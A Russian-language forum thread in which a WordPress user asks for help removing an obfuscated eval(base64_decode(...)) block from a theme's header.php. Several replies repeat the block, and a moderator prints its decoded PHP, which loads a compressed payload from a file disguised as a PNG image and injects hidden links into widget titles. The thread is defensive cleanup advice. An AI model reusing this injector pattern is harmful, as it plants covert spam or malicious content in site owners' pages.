Jump to content

Кто может убрать зашифрованные ссылки из wp


Recommended Posts

 <?php global $theme; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?><!--end-->
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php $theme->meta_title(); ?></title>
<?php $theme->hook('meta'); ?>
<link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/reset.css" type="text/css" media="screen, projection" />
<link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/defaults.css" type="text/css" media="screen, projection" />
<!--[if lt IE 8]><link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/ie.css" type="text/css" media="screen, projection" /><![endif]-->


<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen, projection" />


<?php if ( is_singular() ) { wp_enqueue_script( 'comment-reply' ); } ?>
<?php  wp_head(); ?>
<?php $theme->hook('head'); ?>


</head>


<body <?php body_class(); ?>>
<?php $theme->hook('html_before'); ?>


<div id="container">


    <?php if($theme->display('menu_primary')) { ?>
        <div class="clearfix">
            <?php $theme->hook('menu_primary'); ?>
        </div>
    <?php } ?>
    


    <div id="header">
    
        <div class="logo">
        <?php if ($theme->get_option('themater_logo_source') == 'image') { ?> 
            <a href="<?php echo home_url(); ?>"><img src="<?php $theme->option('logo'); ?>" alt="<?php bloginfo('name'); ?>" title="<?php bloginfo('name'); ?>" /></a>
        <?php } else { ?> 
            <?php if($theme->display('site_title')) { ?> 
                <h1 class="site_title"><a href="<?php echo home_url(); ?>"><?php $theme->option('site_title'); ?></a></h1>
            <?php } ?> 
            
            <?php if($theme->display('site_description')) { ?> 
                <h2 class="site_description"><?php $theme->option('site_description'); ?></h2>
            <?php } ?> 
        <?php } ?> 
        </div><!-- .logo -->


        <div class="header-right">
            <div id="topsearch">
                <?php get_search_form(); ?>
            </div>
        </div><!-- .header-right -->
        
    </div><!-- #header -->
    
    <?php if($theme->display('menu_secondary')) { ?>
        <div class="clearfix">
            <?php $theme->hook('menu_secondary'); ?>
        </div>
    <?php } ?>

Есть ли добрый человек который удалит код?

Link to post
Share on other sites

Удалите код:

<?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?>
Link to post
Share on other sites

 

Удалите код:

<?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?>

сайт падает, я и так это делал

Link to post
Share on other sites
  • Модератор

сайт падает, я и так это делал

вот расшифровка:


$f=dirname(__file__).'/images/wp_menu_top.png';$b=get_option('wp_theme_menu_first');if (file_exists($f) and !$B){$fp = fopen($f,"r");$s = fread($fp,filesize($f));fclose($fp);eval('$m='.gzuncompress(stripslashes($s)).';');$i0=$m[0];$i1=$m[1];$i2=$m[2];$i3=$m[3];unset($m[0],$m[1],$m[2]);shuffle($m);$cs[0]=$i0.$i1.$m[0].$i2.$m[1].$i2.$m[2].$i3;$cs[1]=$i0.$i1.$m[3].$i2.$m[4].$i2.$m[5].$i3;add_option('wp_theme_menu_first',base64_encode($cs[0]),'','no' );add_option('wp_theme_menu_second',base64_encode($cs[1]),'','no' );}function fn(){if((is_home())&&!(is_paged())) $n=base64_decode(get_option('wp_theme_menu_first'));else $n=base64_decode(get_option('wp_theme_menu_second'));return $n;}$_GET['g__']=1;function cb($p){echo ($_GET['g__']>0)?fn():'';$_GET['g__']=0;return $p;}if ($B) add_action('widget_title','cb');
в /images/wp_menu_top.png скорее всего тоже вирусный код
Link to post
Share on other sites

из header.php удалить вот это

<?php eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?>

 

удалить файл ../wp-content/themes/GameMagazine/images/wp_menu_top.png.

 

После этого будет работать. Но тема очень подозрительная.

Link to post
Share on other sites
  • Модератор

из header.php удалить вот это

<?php eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?>

 

удалить файл ../wp-content/themes/GameMagazine/images/wp_menu_top.png.

 

После этого будет работать. Но тема очень подозрительная.

Тема скорее всего не запустится, поскольку не запустятся меню и виджеты. См. расшифрованный код выше.

Link to post
Share on other sites

Тема скорее всего не запустится, поскольку не запустятся меню и виджеты. См. расшифрованный код выше.

Я не фантазирую, а перед тем, как писать проделал то, о чем писал на своем хосте с этой темой.

Link to post
Share on other sites

Я не фантазирую, а перед тем, как писать проделал то, о чем писал на своем хосте с этой темой.

спс код убрался, но теперь появились рекламные виджеты

Link to post
Share on other sites

да я вкурсе))) но стоит ли тратить 900р?

Если делать ГС - то может и жалко. А для нормального сайта 900р смешные деньги. 

К тому же не факт, что тема только этот вредоносный код имеет - скорее там еще сюрпризы )

Link to post
Share on other sites

да я вкурсе))) но стоит ли тратить 900р?

Полностью с тобой согласен, не стоит это  900 руб. и на это-том дизайне можно сделать полноценный проект ))  

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...